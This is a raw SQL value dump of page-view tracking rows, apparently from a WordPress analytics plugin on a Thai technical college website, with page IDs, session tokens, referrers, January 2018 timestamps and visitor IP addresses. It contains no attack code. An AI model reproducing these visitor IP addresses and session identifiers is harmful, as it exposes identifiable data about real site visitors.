(241, '287', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:42', '223.24.178.209'),
(242, '287', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:42', '223.24.178.209'),
(243, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:22:35', '223.24.178.209'),
(244, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:22:35', '223.24.178.209'),
(245, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:22:35', '223.24.178.209'),
(246, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:22:35', '223.24.178.209'),
(247, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:22:35', '223.24.178.209'),
(248, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:22:35', '223.24.178.209'),
(249, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:24:35', '192.168.10.71'),
(250, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:24:35', '192.168.10.71'),
(251, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:24:35', '192.168.10.71'),
(252, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:24:35', '192.168.10.71'),
(253, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:24:35', '192.168.10.71'),
(254, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:24:35', '192.168.10.71'),
(255, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:25:52', '192.168.10.71'),
(256, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:25:52', '192.168.10.71'),
(257, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:25:52', '192.168.10.71'),
(258, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:25:52', '192.168.10.71'),
(259, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:25:52', '192.168.10.71'),
(260, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:25:52', '192.168.10.71'),
(261, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:26:17', '192.168.10.71'),
(262, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:26:17', '192.168.10.71'),
(263, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:26:17', '192.168.10.71'),
(264, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:26:17', '192.168.10.71'),
(265, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:26:18', '192.168.10.71'),
(266, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:26:18', '192.168.10.71'),
(267, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:20', '192.168.10.71'),
(268, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:20', '192.168.10.71'),
(269, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:20', '192.168.10.71'),
(270, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:20', '192.168.10.71'),
(271, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:20', '192.168.10.71'),
(272, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:20', '192.168.10.71'),
(273, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:24', '192.168.10.71'),
(274, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:24', '192.168.10.71'),
(275, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:24', '192.168.10.71'),
(276, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:24', '192.168.10.71'),
(277, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:25', '192.168.10.71'),
(278, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:26:25', '192.168.10.71'),
(279, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:18', '192.168.10.71'),
(280, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:18', '192.168.10.71'),
(281, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:18', '192.168.10.71'),
(282, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:18', '192.168.10.71'),
(283, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:18', '192.168.10.71'),
(284, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:18', '192.168.10.71'),
(285, '634', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:44', '192.168.10.71'),
(286, '634', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:44', '192.168.10.71'),
(287, '634', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:44', '192.168.10.71'),
(288, '634', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:44', '192.168.10.71'),
(289, '634', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:44', '192.168.10.71'),
(290, '634', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:44', '192.168.10.71'),
(291, '634', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:54', '192.168.10.71'),
(292, '634', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:54', '192.168.10.71'),
(293, '634', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:54', '192.168.10.71'),
(294, '634', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:54', '192.168.10.71'),
(295, '634', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:54', '192.168.10.71'),
(296, '634', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:34:54', '192.168.10.71'),
(297, '160', '634', 0, 0, 'cTk0EuxXTiJ7yqpdTGw8s6cRFZAySEr7dED', 0, '38i20mja4pigc4age46k7vcnq3', 'Direct Traffic', '2018-01-16 16:40:10', '1.46.104.26'),
(298, '160', '634', 0, 0, 'Qvm1fkr9u0ogiMvsPNNU5krIw1JlZfzTmrX', 0, 'lvqlrljmj79e6fphn95tuc50q6', 'https://www.google.co.th/', '2018-01-16 16:40:15', '118.173.1.102'),
(299, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:26', '192.168.10.71'),
(300, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:26', '192.168.10.71'),
(301, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:26', '192.168.10.71'),
(302, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:26', '192.168.10.71'),
(303, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:26', '192.168.10.71'),
(304, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:26', '192.168.10.71'),
(305, '287', '634', 0, 0, 'Qvm1fkr9u0ogiMvsPNNU5krIw1JlZfzTmrX', 0, 'lvqlrljmj79e6fphn95tuc50q6', 'https://www.google.co.th/', '2018-01-16 16:40:27', '118.173.1.102'),
(306, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:28', '192.168.10.71'),
(307, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:28', '192.168.10.71'),
(308, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:28', '192.168.10.71'),
(309, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:28', '192.168.10.71'),
(310, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:28', '192.168.10.71'),
(311, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:28', '192.168.10.71'),
(312, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:32', '192.168.10.71'),
(313, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:32', '192.168.10.71'),
(314, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:32', '192.168.10.71'),
(315, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:32', '192.168.10.71'),
(316, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:32', '192.168.10.71'),
(317, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:40:32', '192.168.10.71'),
(318, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:01', '192.168.10.71'),
(319, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:01', '192.168.10.71'),
(320, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:01', '192.168.10.71'),
(321, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:01', '192.168.10.71'),
(322, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:01', '192.168.10.71'),
(323, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:01', '192.168.10.71'),
(324, '160', '622', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:09', '192.168.10.71'),
(325, '160', '624', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:09', '192.168.10.71'),
(326, '160', '625', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:09', '192.168.10.71'),
(327, '160', '626', 1, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:09', '192.168.10.71'),
(328, '160', '633', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:09', '192.168.10.71'),
(329, '160', '634', 0, 0, 'ZN10RpETB9n1S74cox1lrZeoWxxGRhanlXg', 0, 'vk39389tddrjn7320f2m1rpph3', 'Direct Traffic', '2018-01-16 16:41:09', '192.168.10.71'),
(330, '160', '634', 0, 0, 'TvGTG4TFKzuKAcBdkWE9Tq8ssOXST8m9QTz', 0, '5id1nhsp22jm0ovsri5iunj5v2', 'Direct Traffic', '2018-01-17 05:18:00', '171.4.15.28'),
(331, '160', '634', 0, 0, 'cBSKueCqoKR25ggJ2vnMfcZ26XWqp5uH893', 0, '2r7593omivqhgp08b8r7814ke1', 'http://www.google.co.th/', '2018-01-17 08:59:33', '1.47.4.235'),
(332, '160', '634', 0, 0, '2RUwKrRM8eDoCW9QhlXHC2EulsOcpUTWxcV', 0, 'c4qtecngii59k1pjq650ge41a6', 'http://www.google.co.th/', '2018-01-17 08:59:34', '40.40.8.121'),
(333, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 08:59:36', '1.47.3.71'),
(334, '160', '634', 0, 0, 'S7ahN04v9PE7aIdEXoNVGr4gLCvxTnKk2T8', 0, 'pv5ef5vaikdg91qerboc09cdi0', 'http://192.168.77.253:8024/index.php?zone=vlan77', '2018-01-17 08:59:37', '192.168.77.121'),
(335, '160', '634', 0, 0, 'OyCpIq5odnB4OutaivTEW6M0GwpV0UQTCBd', 0, 'lcih0ji7emhaidr1841pcnsbs1', 'https://www.google.co.th/', '2018-01-17 08:59:40', '223.27.222.178'),
(336, '160', '634', 0, 0, '3DT4lONw480kzC9Wn3cVArtrFQ9JCCsUK8i', 0, 'p3q80vh6dt9dv72k36b7vohk33', 'http://40.40.15.253:8028/index.php?zone=vlan200', '2018-01-17 08:59:43', '20.20.3.88'),
(337, '287', '634', 0, 0, 'OyCpIq5odnB4OutaivTEW6M0GwpV0UQTCBd', 0, 'lcih0ji7emhaidr1841pcnsbs1', 'https://www.google.co.th/', '2018-01-17 08:59:47', '223.27.222.178'),
(338, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 08:59:56', '192.168.30.13'),
(339, '160', '634', 0, 0, 'RPKVAwiTWFdh0zFZkW16JE2W66NsDF1OewM', 0, 'f0b730r9fg6052oj2oaqb7chg5', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 09:00:07', '192.168.10.86'),
(340, '160', '634', 0, 0, 'u282tmS0C8F2w9rTPDOafFTOarDKyfVieN8', 0, '88gr4ba95sd6n84043v2f9p0g6', 'http://40.40.15.253:8028/index.php?zone=vlan200', '2018-01-17 09:00:10', '40.40.1.66'),
(341, '160', '634', 0, 0, 'OyCpIq5odnB4OutaivTEW6M0GwpV0UQTCBd', 0, 'lcih0ji7emhaidr1841pcnsbs1', 'https://www.google.co.th/', '2018-01-17 09:00:19', '223.27.222.178'),
(342, '160', '634', 0, 0, '5VAVV9J5HJoMWD5l11kTnP5V80WS8156T6b', 0, '9qif97bs946c6gob9ib0atdgq3', 'https://www.google.co.th/', '2018-01-17 09:00:22', '223.204.242.10'),
(343, '160', '634', 0, 0, '2RUwKrRM8eDoCW9QhlXHC2EulsOcpUTWxcV', 0, 'c4qtecngii59k1pjq650ge41a6', 'http://www.google.co.th/', '2018-01-17 09:00:29', '40.40.8.121'),
(344, '160', '634', 0, 0, 'Da1uqWTRiIR90xgqXCGXDmrWVKhI5LBcdCg', 0, 'qkfo88uv4s3r5eb0i08f9j8955', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-17 09:00:35', '20.20.10.21'),
(345, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:00:40', '192.168.30.13'),
(346, '634', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:01:20', '192.168.30.13'),
(347, '634', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:01:26', '192.168.30.13'),
(348, '160', '634', 0, 0, 'cBSKueCqoKR25ggJ2vnMfcZ26XWqp5uH893', 0, '2r7593omivqhgp08b8r7814ke1', 'http://www.google.co.th/', '2018-01-17 09:01:53', '1.47.4.235'),
(349, '634', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:03:20', '192.168.30.13'),
(350, '160', '634', 0, 0, '5VAVV9J5HJoMWD5l11kTnP5V80WS8156T6b', 0, '9qif97bs946c6gob9ib0atdgq3', 'https://www.google.co.th/', '2018-01-17 09:03:29', '223.204.242.10'),
(351, '634', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:03:33', '192.168.30.13'),
(352, '160', '634', 0, 0, '5VAVV9J5HJoMWD5l11kTnP5V80WS8156T6b', 0, '9qif97bs946c6gob9ib0atdgq3', 'https://www.google.co.th/', '2018-01-17 09:07:09', '223.204.242.10'),
(353, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:08:03', '192.168.30.13'),
(354, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:08:08', '192.168.30.13'),
(355, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:09:43', '1.47.3.71'),
(356, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:10:13', '1.47.3.71'),
(357, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:10:21', '1.47.3.71'),
(358, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:10:40', '1.47.3.71'),
(359, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:10:56', '1.47.3.71'),
(360, '485', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:11:08', '1.47.3.71'),
(361, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:11:09', '1.47.3.71'),
(362, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:12:20', '1.47.3.71'),
(363, '634', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-17 09:12:58', '192.168.30.13'),
(364, '160', '634', 0, 0, 'AvxNFynrNgMgP75zf74ZUClRq5soaQMppUC', 0, 'nff0qcn98ibt783k4omju7k512', 'Direct Traffic', '2018-01-17 09:13:14', '1.47.3.71'),
(365, '160', '634', 0, 0, '3ac0SxxI2IXqPmke3QmBrrE9hzQU3OVVAxZ', 0, 'c0p6lgcsdqs3tearkbk3heol31', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-17 09:20:30', '20.20.10.194'),
(366, '160', '634', 0, 0, '0fDCQD5zmECbQ45Ox6rkyUcvywMoWNUvMRc', 0, 'csfa3bp0qks4l2a3fqb1jdl933', 'http://www.google.co.th/', '2018-01-17 09:59:37', '40.40.8.121'),
(367, '160', '634', 0, 0, 'RPKVAwiTWFdh0zFZkW16JE2W66NsDF1OewM', 0, 'f0b730r9fg6052oj2oaqb7chg5', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 10:13:08', '192.168.10.86'),
(368, '320', '634', 0, 0, 'RPKVAwiTWFdh0zFZkW16JE2W66NsDF1OewM', 0, 'f0b730r9fg6052oj2oaqb7chg5', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 10:13:26', '192.168.10.86'),
